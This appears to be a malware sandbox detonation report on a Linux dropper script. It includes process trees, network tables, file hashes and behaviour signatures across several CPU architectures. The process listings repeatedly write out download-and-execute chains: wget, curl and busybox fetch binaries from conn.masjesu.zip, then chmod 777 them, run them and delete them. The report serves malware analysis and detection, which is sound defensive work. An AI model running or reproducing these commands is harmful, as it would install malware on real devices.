[wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/chmod
[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/rm
[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/chmod
[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/rm
[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/chmod
[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/rm
[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/chmod
[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf
[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/rm
[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/chmod
[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk
[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/rm
[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/chmod
[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh
[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/rm
[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/chmod
[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC
[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/rm
[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/chmod
[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR
[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/rm
[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/chmod
[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx
[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/rm
[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-25 01:24
Reported
2024-10-25 01:28
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
131s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /usr/bin/curl | N/A |
Processes
/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
[/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/chmod
[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/rm
[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp |
Files
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-25 01:24
Reported
2024-10-25 01:27
Platform
debian9-armhf-20240418-en
Max time kernel
149s
Max time network
2s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
[/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-25 01:24
Reported
2024-10-25 01:27
Platform
debian9-mipsbe-20240418-en
Max time kernel
82s
Max time network
83s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | N/A |
| N/A | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | N/A |
| N/A | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | N/A |
| N/A | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | N/A |
| N/A | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | N/A |
| N/A | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | N/A |
| N/A | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | N/A |
| N/A | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | N/A |
| N/A | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | N/A |
| N/A | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | N/A |
| N/A | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | N/A |
| N/A | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | N/A |
| N/A | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | N/A |
| N/A | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | N/A |
| N/A | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | N/A |
| N/A | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | N/A |
| N/A | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | N/A |
| N/A | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | N/A |
| N/A | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | N/A |
| N/A | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | N/A |
| N/A | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | N/A |
| N/A | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | N/A |
| N/A | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | N/A |
| N/A | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | N/A |
| N/A | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | N/A |
| N/A | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | N/A |
| N/A | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | N/A |
| N/A | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
